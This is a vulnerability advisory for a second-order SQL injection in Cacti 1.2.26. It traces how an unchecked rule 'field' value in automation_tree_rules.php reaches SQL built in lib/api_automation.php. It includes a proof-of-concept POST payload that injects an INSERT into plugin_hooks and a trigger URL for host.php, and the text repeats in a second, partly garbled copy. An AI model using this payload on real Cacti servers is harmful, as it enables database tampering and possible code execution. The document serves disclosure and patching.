Some of the data stored in automation_tree_rules.php
is not thoroughly checked and is used to concatenate the SQL statement in
function from lib/api_automation.php
, finally resulting in SQL injection.
Another SQL injection again, verified in version 1.2.26.
1. Store dirty data
Same as
The writing of dirty data can be done from automation_tree_rules_form_save()
function in automation_tree_rules.php
. This requires administrator privileges of Automation. The field field
of the automation_tree_rule_items
table are controllable.

2. Read and concatenate the SQL statement
The attack starts with the form_action()
function in host.php
and finally arriving at build_matching_objects_filter()
in lib/api.automation.php
. The call stack is as follows.

The build_matching_objects_filter()
function constructs a filter for SQL statements by reading the database, and after confirming the corresponding rules, the SQL statement is constructed by the build_rule_item_filter() function.
function build_matching_objects_filter($rule_id, $rule_type) {
// ...
// Read automation_match_rule_items
$rule_items = db_fetch_assoc_prepared('SELECT *
FROM automation_match_rule_items
WHERE rule_id = ?
AND rule_type = ?
ORDER BY sequence',
array($rule_id, $rule_type));
if (cacti_sizeof($rule_items)) {
// Build filter
$sql_filter = build_rule_item_filter($rule_items);
// ...
return trim($sql_filter);
In build_rule_item_filter()
, the field
field of the read rule is concatenated into the SQL statement return.
function build_rule_item_filter($automation_rule_items, $prefix = '') {
// ...
$sql_filter = '';
$indent = 1;
if (cacti_sizeof($automation_rule_items)) {
// ...
foreach($automation_rule_items as $automation_rule_item) {
// ...
if ($automation_rule_item['field'] != '') {
// Concatenated field into the SQL statement
$sql_filter .= ' ' . $prefix . '`' . implode('`.`', explode('.', $automation_rule_item['field'])) . '`';
// ...
return $sql_filter;
In get_matching_hosts()
, the concatenated SQL statements is executed.
function get_matching_hosts($rule, $rule_type, $sql_where='') {
// ...
/* get the WHERE clause for matching hosts */
$sql_filter = ' WHERE h.deleted = "" AND (' . build_matching_objects_filter($rule['id'], $rule_type) .')';
if ($sql_where != '') {
$sql_filter .= ' AND ' . $sql_where;
// Executed
$results = db_fetch_assoc($sql_query . $sql_filter, false);
Store dirty data
POST access automation_tree_rules.php and submit the following data:
'save_component_automation_tree_rule_item' => 1,
'field'=>"` LIKE '%Linux%');INSERT INTO plugin_hooks VALUES (3,'a','a','../../../../','.','a');#",
'__csrf_magic'=> ''
Read and concatenate the SQL statement
GET access : http://ip:port/host.php?action=actions&action=actions&drp_action=6&selected_items=a:1:{i:0;i:1;}

Due to the code of implode('`.`', explode('.', $automation_rule_item['field']))
in build_rule_item_filter()
, the character of .
in malicious SQL statements will be changed to `.`
. When concatenating SQL statements, be careful to avoid the use of this character.
Using SQL based secondary injection technology, attackers can modify the contents of the Cacti database, and based on the modified content, it may be possible to achieve further impact, such as arbitrary file reading, and even remote code execution through arbitrary file writing.
Researcher: ISHGARD-2, USTC
Some of the data stored in
is not thoroughly checked and is used to concatenate the SQL statement inbuild_rule_item_filter()
function fromlib/api_automation.php
, finally resulting in SQL injection.Another SQL injection again, verified in version 1.2.26.
1. Store dirty data
Same as

The writing of dirty data can be done from
function inautomation_tree_rules.php
. This requires administrator privileges of Automation. The fieldfield
of theautomation_tree_rule_items
table are controllable.2. Read and concatenate the SQL statement
The attack starts with the

function inhost.php
and finally arriving atbuild_matching_objects_filter()
. The call stack is as follows.The
function constructs a filter for SQL statements by reading the database, and after confirming the corresponding rules, the SQL statement is constructed by the build_rule_item_filter() function.In
, thefield
field of the read rule is concatenated into the SQL statement return.In
, the concatenated SQL statements is executed.PoC
Store dirty data
POST access automation_tree_rules.php and submit the following data:
Read and concatenate the SQL statement
GET access :

Due to the code of
implode('`.`', explode('.', $automation_rule_item['field']))
, the character of.
in malicious SQL statements will be changed to`.`
. When concatenating SQL statements, be careful to avoid the use of this character.Impact
Using SQL based secondary injection technology, attackers can modify the contents of the Cacti database, and based on the modified content, it may be possible to achieve further impact, such as arbitrary file reading, and even remote code execution through arbitrary file writing.
Researcher: ISHGARD-2, USTC